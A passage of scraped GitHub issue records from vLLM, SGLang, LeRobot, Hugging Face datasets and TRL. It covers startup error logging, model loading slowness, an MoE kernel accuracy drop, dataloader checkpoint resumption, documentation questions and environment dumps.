feature, motivation and pitch\n\nvLLM has a multiprocess architecture with:\n- API Server --> EngineCore --> [N] Workers\n\nAs a result, clean error-message logging is challenging, since the error that surfaces in the API server will often not be the root-cause error. 
An example of this is at startup time:\n\n```\n(vllm) [robertgshaw2-redhat@nm-automation-h100-standalone-1-preserve vllm]$ just launch_cutlass_tensor\nVLLM_USE_DEEP_GEMM=0 VLLM_USE_FLASHINFER_MOE_FP8=1 VLLM_FLASHINFER_MOE_BACKEND=throughput chg run --gpus 2 -- vllm serve amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV -tp 2 --port 8002 --max-model-len 8192\nReserved 2 GPU(s): [1 3] for command execution\n(APIServer pid=116718) INFO 01-04 14:48:03 [api_server.py:1277] vLLM API server version 0.13.0rc2.dev185+g00a8d7628\n(APIServer pid=116718) INFO 01-04 14:48:03 [utils.py:253] non-default args: {'model_tag': 'amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV', 'port': 8002, 'model': 'amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV', 'max_model_len': 8192, 'tensor_parallel_size': 2}\n(APIServer pid=116718) INFO 01-04 14:48:04 [model.py:522] Resolved architecture: MixtralForCausalLM\n(APIServer pid=116718) INFO 01-04 14:48:04 [model.py:1510] Using max model len 8192\n(APIServer pid=116718) WARNING 01-04 14:48:04 [vllm.py:1453] Current vLLM config is not set.\n(APIServer pid=116718) INFO 01-04 14:48:04 [scheduler.py:231] Chunked prefill is enabled with max_num_batched_tokens=2048.\n(APIServer pid=116718) INFO 01-04 14:48:04 [vllm.py:635] Disabling NCCL for DP synchronization when using async scheduling.\n(APIServer pid=116718) INFO 01-04 14:48:04 [vllm.py:640] Asynchronous scheduling is enabled.\n(APIServer pid=116718) INFO 01-04 14:48:05 [scheduler.py:231] Chunked prefill is enabled with max_num_batched_tokens=8192.\n(EngineCore_DP0 pid=116936) INFO 01-04 14:48:12 [core.py:96] Initializing a V1 LLM engine (v0.13.0rc2.dev185+g00a8d7628) with config: model='amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV', speculative_config=None, tokenizer='amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=8192, download_dir=None, load_format=auto, tensor_parallel_size=2, pipeline_parallel_size=1, data_parallel_size=1, disable_custom_all_reduce=False, quantization=fp8, enforce_eager=False, kv_cache_dtype=auto, device_config=cuda, structured_outputs_config=StructuredOutputsConfig(backend='auto', disable_fallback=False, disable_any_whitespace=False, disable_additional_properties=False, reasoning_parser='', reasoning_parser_plugin='', enable_in_reasoning=False), observability_config=ObservabilityConfig(show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None, kv_cache_metrics=False, kv_cache_metrics_sample=0.01, cudagraph_metrics=False, enable_layerwise_nvtx_tracing=False, enable_mfu_metrics=False, enable_mm_processor_stats=False), seed=0, served_model_name=amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV, enable_prefix_caching=True, enable_chunked_prefill=True, pooler_config=None, compilation_config={'level': None, 'mode': , 'debug_dump_path': None, 'cache_dir': '', 'compile_cache_save_format': 'binary', 'backend': 'inductor', 'custom_ops': ['none'], 'splitting_ops': ['vllm::unified_attention', 'vllm::unified_attention_with_output', 'vllm::unified_mla_attention', 'vllm::unified_mla_attention_with_output', 'vllm::mamba_mixer2', 'vllm::mamba_mixer', 'vllm::short_conv', 'vllm::linear_attention', 'vllm::plamo2_mamba_mixer', 'vllm::gdn_attention_core', 'vllm::kda_attention', 'vllm::sparse_attn_indexer'], 'compile_mm_encoder': False, 'compile_sizes': [], 'compile_ranges_split_points': [8192], 'inductor_compile_config': {'enable_auto_functionalized_v2': False, 'combo_kernels': True, 
'benchmark_combo_kernel': True}, 'inductor_passes': {}, 'cudagraph_mode': , 'cudagraph_num_of_warmups': 1, 'cudagraph_capture_sizes': [1, 2, 4, 8, 16, 24, 32, 40, 48, 56, 64, 72, 80, 88, 96, 104, 112, 120, 128, 136, 144, 152, 160, 168, 176, 184, 192, 200, 208, 216, 224, 232, 240, 248, 256, 272, 288, 304, 320, 336, 352, 368, 384, 400, 416, 432, 448, 464, 480, 496, 512], 'cudagraph_copy_inputs': False, 'cudagraph_specialize_lora': True, 'use_inductor_graph_partition': False, 'pass_config': {'fuse_norm_quant': False, 'fuse_act_quant': False, 'fuse_attn_quant': False, 'eliminate_noops': True, 'enable_sp': False, 'fuse_gemm_comms': False, 'fuse_allreduce_rms': False}, 'max_cudagraph_capture_size': 512, 'dynamic_shapes_config': {'type': , 'evaluate_guards': False}, 'local_cache_dir': None}\n(EngineCore_DP0 pid=116936) WARNING 01-04 14:48:12 [multiproc_executor.py:882] Reducing Torch parallelism from 80 threads to 1 to avoid unnecessary CPU contention. Set OMP_NUM_THREADS in the external environment to tune this value as needed.\nINFO 01-04 14:48:20 [parallel_state.py:1214] world_size=2", "url": "https://github.com/vllm-project/vllm/issues/31683", "state": "open", "labels": [ "help wanted", "feature request" ], "created_at": "2026-01-04T14:53:38Z", "updated_at": "2026-01-04T14:53:43Z", "comments": 0, "user": "robertgshaw2-redhat" }, { "repo": "sgl-project/sglang", "number": 16362, "title": "[Bug] Deepseekv3.2 detects eos when reasoning", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [x] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nWhen making reasoning requests to the deepseekv3.2 model, I found that, at random, only the reasoning content appears, while both the content and the function call are empty. The probability of this happening is about 1/5. My request expects a function call to be returned.\nDuring debugging, I discovered that an EOS was detected during the reasoning phase. 
Is there a convenient way to replace the EOS with ?\n\n### Reproduction\n\n/\n\n### Environment\n\n/", "url": "https://github.com/sgl-project/sglang/issues/16362", "state": "open", "labels": [], "created_at": "2026-01-04T02:43:14Z", "updated_at": "2026-01-04T02:43:14Z", "comments": 0, "user": "duzeyan" }, { "repo": "vllm-project/vllm", "number": 31646, "title": "[Usage]: How can I use GPU12 as standalone KV LMCache?", "body": "### Your current environment\n\n```text\nCollecting environment information...\nuv is set\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.12-13-pve-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.61\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA GeForce RTX 3090\nGPU 1: NVIDIA GeForce RTX 3090\nGPU 2: NVIDIA GeForce RTX 3090\nGPU 3: NVIDIA GeForce RTX 3090\nGPU 4: NVIDIA GeForce RTX 3090\nGPU 5: NVIDIA GeForce RTX 3090\nGPU 6: NVIDIA GeForce RTX 3090\nGPU 7: NVIDIA GeForce RTX 3090\nGPU 8: NVIDIA GeForce RTX 3090\nGPU 9: NVIDIA GeForce RTX 3090\nGPU 10: NVIDIA GeForce RTX 3090\nGPU 11: NVIDIA GeForce RTX 3090\nGPU 12: NVIDIA GeForce RTX 3090\n\nNvidia driver version : 570.172.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 43 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 64\nOn-line CPU(s) list: 0-9,11,13-24,26-50,52-63\nOff-line CPU(s) list: 10,12,25,51\nVendor ID: AuthenticAMD\nBIOS Vendor ID: Advanced Micro Devices, Inc.\nModel name: AMD EPYC 7532 32-Core Processor\nBIOS Model name: AMD EPYC 7532 32-Core Processor Unknown CPU @ 2.4GHz\nBIOS CPU family: 107\nCPU family: 23\nModel: 49\nThread(s) per core: 2\nCore(s) per socket: 32\nSocket(s): 1\nStepping: 0\nFrequency boost: enabled\nCPU(s) scaling MHz: 120%\nCPU max MHz: 2400.0000\nCPU min MHz: 1500.0000\nBogoMIPS: 4799.61\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local clzero irperf xsaveerptr rdpru wbnoinvd arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists 
pausefilter pfthreshold avic v_vmsave_vmload vgif v_spec_ctrl umip rdpid overflow_recov succor smca sev sev_es\nVirtualization: AMD-V\nL1d cache: 1 MiB (32 instances)\nL1i cache: 1 MiB (32 instances)\nL2 cache: 16 MiB (32 instances)\nL3 cache: 256 MiB (16 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-63\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Mitigation; untrained return thunk; SMT enabled with STIBP protection\nVulnerability Spec rstack overflow: Mitigation; Safe RET\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: ", "url": "https://github.com/vllm-project/vllm/issues/31646", "state": "open", "labels": [ "usage" ], "created_at": "2026-01-03T13:25:41Z", "updated_at": "2026-01-03T13:25:41Z", "comments": 0, "user": "joshuakoh1" }, { "repo": "vllm-project/vllm", "number": 31624, "title": "[Bug]: ModelOpt Llama-4 Checkpoints Take 5+ minutes to load", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nIn working on some MoE refactors, I discovered that L4 for ModelOpt takes 5+minutes to load weights even from CPU page cache. \n- https://huggingface.co/nvidia/Llama-4-Scout-17B-16E-Instruct-FP8\n\nThe root cause is basically this hack logic to load the state dict that ModelOpt uses\n- https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/models/llama4.py#L439-L523 [modelopt is the fused case] \n\nWhat happens is that the CPU tensor (loaded weight) that we are going to load into the GPU tensor (param) becomes non-contiguous due to this logic. As a result, when we eventually call `_copy()` from CPU->GPU we are calling this on a non-contiguous cpu tensor which takes 3-4s per weight.\n\nTo hack around this for local R&D, I simply immediately move the loaded_weight to the GPU. This makes the gather happen on the GPU which accelerates things a lot. This isn't reasonable as an actual solution though\n\nWe should investigate where the logic in the weight loader can avoid creating non-contiguous CPU tensors\n\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31624", "state": "open", "labels": [ "bug", "help wanted", "good first issue", "feature request" ], "created_at": "2026-01-02T15:18:14Z", "updated_at": "2026-01-06T02:42:32Z", "comments": 6, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/lerobot", "number": 2741, "title": "XVLA: Clarification on provided lerobot/xvla-base model checkpoint and documentation", "body": "### Ticket Type\n\n\u2753 Technical Question\n\n### Environment & System Info\n\n```Shell\n\n```\n\n### Description\n\nDear lerobot-Team,\n\nI hope you had a good start into 2026 and thanks for the great work on making X-VLA natively available via lerobot.\nI have a few questions regarding the _lerobot/xvla-base_ checkpoint and the information provided in the [documentation](https://huggingface.co/docs/lerobot/en/xvla#-base-model) about it:\n\n1. 
You write in the documentation that the checkpoint has been trained with a two-stage approach:\n\n> A 0.9B parameter instantiation of X-VLA, trained with a carefully designed data processing and learning recipe. The training pipeline consists of two phases:\nPhase I: Pretraining - Pretrained on 290K episodes from Droid, Robomind, and Agibot, spanning seven platforms across five types of robotic arms (single-arm to bi-manual setups). By leveraging soft prompts to absorb embodiment-specific variations, the model learns an embodiment-agnostic generalist policy.\nPhase II: Domain Adaptation - Adapted to deployable policies for target domains. A new set of soft prompts is introduced and optimized to encode the hardware configuration of the novel domain, while the pretrained backbone remains frozen.\n\nI was now wondering whether _lerobot/xvla-base_ has really been trained with domain adaptation already or whether it has only been pre-trained as described in the X-VLA paper, i.e. with 290k trajectories of DROID, Robomind etc. If this is the case, it might be clearer to update the documentation to remove Phase II to avoid confusion. If _lerobot/xvla-base_ has really been trained on Domain Adaptation already, could you please explain why this was done for a base checkpoint and which datasets/ training hyperparams were chosen for this (this is not detailed in the paper).\n\n2. You mention [here](https://huggingface.co/docs/lerobot/en/xvla#2-domain-ids) that _lerobot/xvla-base_ has been trained on the following domain_ids:\n\n> \n\nDataset Name | Domain ID\n-- | --\nBridge | 0\nRT1 | 1\nCalvin | 2\nlibero | 3\nwidowx-air | 4\nAIR-AGILEX-HQ | 5\nrobotwin2_abs_ee | 6\nrobotwin2_clean | 6\nrobocasa-human | 7\nVLABench | 8\nAGIBOT-challenge | 9\nAIR-AGILEX | 10\nAIRBOT | 18\n\n\n\n\n\nI was wondering whether this is correct because I expected _lerobot/xvla-base_ (as described in 1.) to have been pre-trained on DROID, RoboMind and Agibot. Based on the [original code base](https://github.com/2toinf/X-VLA/blob/main/datasets/domain_config.py), i would have expected that it was pretrained on the following domain_ids:\n \n```\n# pretraining\n \"robomind-franka\": 11,\n \"robomind-ur\": 12,\n \"Droid-Left\": 13,\n \"Droid-Right\": 14,\n \"AGIBOT\": 15,\n \"robomind-agilex\": 16,\n \"robomind-franka-dual\": 17\n```\n\nIs it possible that in the documentation the pretraining and finetuning datasets/ domain ids got mixed up? Or is my understanding simply incorrect? If the pretraining and finetuning domain ids really got mixed up, would it make more sense to choose one of the pretraining domain ids (e.g. 
13) when fine-tuning _lerobot/xvla_ with tasks collected on a setup very similar to DROID ?\n\nThank you very much for your response!\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2741", "state": "open", "labels": [ "documentation", "question", "policies", "dataset", "training" ], "created_at": "2026-01-02T08:38:03Z", "updated_at": "2026-01-04T15:54:55Z", "user": "gianlucageraci" }, { "repo": "huggingface/datasets", "number": 7927, "title": "Using Stateful Dataloader with Split Dataset By Node and DCP for DDP", "body": "### Describe the bug\n\nI am trying to determine how to save and load the Stateful Dataloader State with DCP and Split Dataset by Node for DDP.\n\nCurrently, I am running into the issue where I am receiving a slow resume.\n```\nNeither dataset nor iter(dataset) defines state_dict/load_state_dict so we are naively fast-forwarding your dataset by 5000 steps. For more efficient resumes, please implement `state_dict` and `load_state_dict` in your IterableDataset and/or iterator.\n```\n\n### Steps to reproduce the bug\n\nSay we have a streaming dataset:\n```python\nclass StreamingDataset(IterableDataset):\n def __init__(\n self,\n path: str,\n tokenizer: AutoTokenizer,\n name: Optional[str] = None,\n split: str = \"train\",\n max_length: int = 2048,\n ddp_rank: int = 0,\n ddp_world_size: int = 1,\n ):\n dataset = load_dataset(path, name, split=split, streaming=True)\n self.train_dataset = split_dataset_by_node(\n dataset=dataset, rank=ddp_rank, world_size=ddp_world_size\n )\n\n self.tokenizer = tokenizer\n self.max_length = max_length\n\n def __iter__(self):\n for sample in iter(self.train_dataset):\n tokenized = self.tokenizer(\n sample[\"text\"],\n padding=\"max_length\",\n truncation=True,\n max_length=self.max_length,\n return_special_tokens_mask=True,\n )\n yield tokenized\n```\nWe load that dataset into the Stateful Dataloader:\n```python\n trainloader = StatefulDataLoader(\n dataset=train_dataset,\n batch_size=args.batch_size,\n collate_fn=data_collator,\n )\n```\nWe then have code for checkpointing and resuming the state using DCP:\n```python\nimport os\nfrom typing import Optional\n\nimport torch\nimport torch.distributed as dist\nimport torch.distributed.checkpoint as dcp\nfrom torch.distributed.checkpoint.format_utils import dcp_to_torch_save\nfrom torch.distributed.checkpoint.state_dict import get_state_dict, set_state_dict\n\nfrom blitzbert.utils import print_rank_0\n\n\nclass Checkpoint:\n def __init__(\n self,\n model: torch.nn.Module,\n optimizer: torch.optim.Optimizer,\n trainloader,\n step: Optional[int] = None,\n epoch: Optional[int] = None,\n ):\n self.model = model\n self.optimizer = optimizer\n self.trainloader = trainloader\n self.step = step\n self.epoch = epoch\n\n def get_state_dict(self) -> dict:\n model_state_dict, optimizer_state_dict = get_state_dict(\n self.model, self.optimizer\n )\n return {\n \"model\": model_state_dict,\n \"optim\": optimizer_state_dict,\n \"trainloader\": self.trainloader.state_dict(),\n \"step\": self.step,\n \"epoch\": self.epoch,\n }\n\n\ndef save_checkpoint(\n args,\n model,\n optimizer,\n trainloader,\n step: Optional[int] = None,\n epoch: 
Optional[int] = None,\n final_checkpoint: bool = False,\n):\n checkpointer = Checkpoint(\n model=model,\n optimizer=optimizer,\n trainloader=trainloader,\n step=step,\n epoch=epoch,\n )\n\n state_dict = checkpointer.get_state_dict()\n\n if final_checkpoint:\n print_rank_0(\"Saving final model\")\n \n save_path = os.path.join(args.checkpoint_dir, \"final_model\")\n \n dcp.save(state_dict, checkpoint_id=save_path)\n dist.barrier()\n\n single_file_path = os.path.join(args.checkpoint_dir, \"final_checkpoint.pth\")\n dcp_to_torch_save(save_path, single_file_path)\n else:\n if step % args.checkpointing_steps == 0 and step != 0:\n print_rank_0(f\"Saving model at step: {step}\")\n save_path = os.path.join(args.checkpoint_dir, f\"epoch_{epoch}_step_{step}\")\n dcp.save(state_dict, checkpoint_id=save_path)\n dist.barrier()\n\n\ndef load_checkpoint(args, model, optimizer, trainloader):\n if not args.resume_from_checkpoint:\n return 0, 0\n\n checkpoint_path = args.resume_from_checkpoint\n print_rank_0(f\"Resumed from checkpoint: {checkpoint_path}\")\n \n checkpointer = Checkpoint(\n model=model,\n optimizer=optimizer,\n trainloader=trainloader,\n )\n\n state_dict = checkpointer.get_state_dict()\n\n dcp.load(\n state_dict=state_dict,\n checkpoint_id=checkpoint_path,\n )\n\n set_state_dict(\n model,\n optimizer,\n model_state_dict=state_dict[\"model\"],\n optim_state_dict=state_dict[\"optim\"],\n )\n\n trainloader.load_state_dict(state_dict[\"trainloader\"])\n \n step = state_dict[\"step\"]\n epoch = state_dict[\"epoch\"]\n\n return step, epoch\n```\nand then loading the checkpoint:\n```python\n completed_steps, current_epoch = load_checkpoint(\n args=args, model=model, optimizer=optimizer, trainloader=trainloader\n )\n```
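\n\nA minimal sketch of the `state_dict`/`load_state_dict` pair the warning asks for, assuming a `datasets` version where the underlying HF `IterableDataset` exposes its own streaming checkpointing (recent releases do), would be to delegate to it from a wrapper (the class name here is hypothetical):\n\n```python\n# Sketch: extend StreamingDataset so StatefulDataLoader can resume without fast-forwarding.\n# Assumes datasets' IterableDataset provides state_dict()/load_state_dict().\nclass ResumableStreamingDataset(StreamingDataset):\n    def state_dict(self) -> dict:\n        # Capture the streaming position of the underlying HF dataset.\n        return self.train_dataset.state_dict()\n\n    def load_state_dict(self, state_dict: dict) -> None:\n        # Restore the streaming position instead of replaying skipped samples.\n        self.train_dataset.load_state_dict(state_dict)\n```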
\n\n### Expected behavior\n\nIf I implement what the warning says:\n```python\n ", "url": "https://github.com/huggingface/datasets/issues/7927", "state": "open", "labels": [], "created_at": "2026-01-01T22:27:07Z", "updated_at": "2026-01-02T02:48:21Z", "comments": 2, "user": "conceptofmind" }, { "repo": "vllm-project/vllm", "number": 31609, "title": "[Bug][ModelOpt]: FlashInfer CUTLASS MoE Accuracy Degraded (Llama4)", "body": "### Your current environment\n\nH100, B200 ---> vllm 0.13.0\n\n### \ud83d\udc1b Describe the bug\n\n- running the following:\n\n```bash\n\n# modelopt\nMODEL_TENSOR := \"nvidia/Llama-4-Scout-17B-16E-Instruct-FP8\"\n\nGPUS := \"2\"\nPORT := \"8001\"\n\n\n# sm90 / sm100\nlaunch_cutlass_tensor:\n\tVLLM_USE_DEEP_GEMM=0 VLLM_USE_FLASHINFER_MOE_FP8=1 VLLM_FLASHINFER_MOE_BACKEND=throughput vllm serve {{MODEL_TENSOR}} -tp {{GPUS}} --port {{PORT}} --max-model-len 8192\n\n\n# sm100\nlaunch_trtllm_tensor:\n\tVLLM_USE_DEEP_GEMM=0 VLLM_USE_FLASHINFER_MOE_FP8=1 VLLM_FLASHINFER_MOE_BACKEND=latency chg run --gpus {{GPUS}} -- vllm serve {{MODEL_TENSOR}} -tp {{GPUS}} --max-model-len 8192\n\neval_block:\n\tlm_eval \\\n\t\t--model local-completions \\\n\t\t--tasks gsm8k \\\n\t\t--model_args \"model={{MODEL_BLOCK}},base_url=http://localhost:{{PORT}}/v1/completions,num_concurrent=1000,tokenized_requests=False\"\n\neval_tensor:\n\tlm_eval \\\n\t\t--model local-completions \\\n\t\t--tasks gsm8k \\\n\t\t--model_args \"model={{MODEL_TENSOR}},base_url=http://localhost:{{PORT}}/v1/completions,num_concurrent=1000,tokenized_requests=False\"\n```\n\nwith cutlass:\n\n```bash\nlocal-completions (model=nvidia/Llama-4-Scout-17B-16E-Instruct-FP8,base_url=http://localhost:8001/v1/completions,num_concurrent=1000,tokenized_requests=False), gen_kwargs: (None), limit: None, num_fewshot: None, batch_size: 1\n|Tasks|Version| Filter |n-shot| Metric | |Value | |Stderr|\n|-----|------:|----------------|-----:|-----------|---|-----:|---|-----:|\n|gsm8k| 3|flexible-extract| 5|exact_match|\u2191 |0.7491|\u00b1 |0.0119|\n| | |strict-match | 5|exact_match|\u2191 |0.7672|\u00b1 |0.0116|\n```\n\nwith trtllm:\n\n```bash\nlocal-completions (model=nvidia/Llama-4-Scout-17B-16E-Instruct-FP8,base_url=http://localhost:8000/v1/completions,num_concurrent=1000,tokenized_requests=False), gen_kwargs: (None), limit: None, num_fewshot: None, batch_size: 1\n|Tasks|Version| Filter |n-shot| Metric | |Value | |Stderr|\n|-----|------:|----------------|-----:|-----------|---|-----:|---|-----:|\n|gsm8k| 3|flexible-extract| 5|exact_match|\u2191 |0.9242|\u00b1 |0.0073|\n| | |strict-match | 5|exact_match|\u2191 |0.9075|\u00b1 |0.0080|\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31609", "state": "closed", "labels": [ "bug", "help wanted" ], "created_at": "2026-01-01T21:45:48Z", "updated_at": "2026-01-03T20:26:38Z", "comments": 2, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/trl", "number": 4766, "title": "Asynchronous generation and training for GRPO?", "body": "### Feature request\n\nGRPOTrainer should send requests for the next batch to the vllm server while it is computing backpropagation, in order to reduce idle time for both the server's GPUs and the trainer's GPUs.\n\n### Motivation\n\nUnder the current GRPO trainer, generation and backpropagation are sequential, meaning that a lot of runtime is wasted. Considering that they use different GPUs in the server setting, it would be beneficial to run generation at the same time as backpropagation. This requires the trainer to send requests for the next batch while running the current batch, and to provide guidance on the ratio of trainer to server GPU counts. A sketch of the idea follows.
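\n\nAs an illustration (hypothetical code, not the current TRL API), the trainer could keep one in-flight generation request ahead of training:\n\n```python\nfrom concurrent.futures import ThreadPoolExecutor\n\ndef train_with_overlap(batches, generate_fn, train_step_fn):\n    # Overlap vLLM-server generation for batch k+1 with backprop on batch k.\n    with ThreadPoolExecutor(max_workers=1) as pool:\n        future = pool.submit(generate_fn, batches[0])  # prefetch generations for batch 0\n        for k in range(len(batches)):\n            completions = future.result()  # wait for batch k's generations\n            if k + 1 < len(batches):\n                # Kick off generation for the next batch before backprop starts.\n                future = pool.submit(generate_fn, batches[k + 1])\n            # Note: batch k+1 is generated with weights that are one optimizer\n            # step stale, so this makes training slightly off-policy.\n            train_step_fn(batches[k], completions)\n```\n\nThe off-policy staleness is the main design trade-off: the overlapped batch is sampled from weights that are one optimizer step behind.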
\n\n### Your contribution\n\nSubmit PR in the future.", "url": "https://github.com/huggingface/trl/issues/4766", "state": "open", "labels": [], "created_at": "2026-01-01T08:42:12Z", "updated_at": "2026-01-01T08:42:12Z", "comments": 0, "user": "sxndqc" }, { "repo": "vllm-project/vllm", "number": 31574, "title": "[Usage]: Does vLLM support loading a LoRA adapter and DeepSeek-V3.1-Terminus at the same time?", "body": "### Your current environment\n\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 3.22.1\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Oct 10 2025, 08:52:57) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.10.134-16.3.al8.x86_64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA H20-3e\nGPU 1: NVIDIA H20-3e\nGPU 2: NVIDIA H20-3e\nGPU 3: NVIDIA H20-3e\nGPU 4: NVIDIA H20-3e\nGPU 5: NVIDIA H20-3e\nGPU 6: NVIDIA H20-3e\nGPU 7: NVIDIA H20-3e\n\nNvidia driver version : 570.133.20\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.17.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nBIOS Vendor ID: Intel(R) Corporation\nModel name: INTEL(R) XEON(R) PLATINUM 8575C\nBIOS Model name: INTEL(R) XEON(R) PLATINUM 8575C\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 2\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5600.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm 
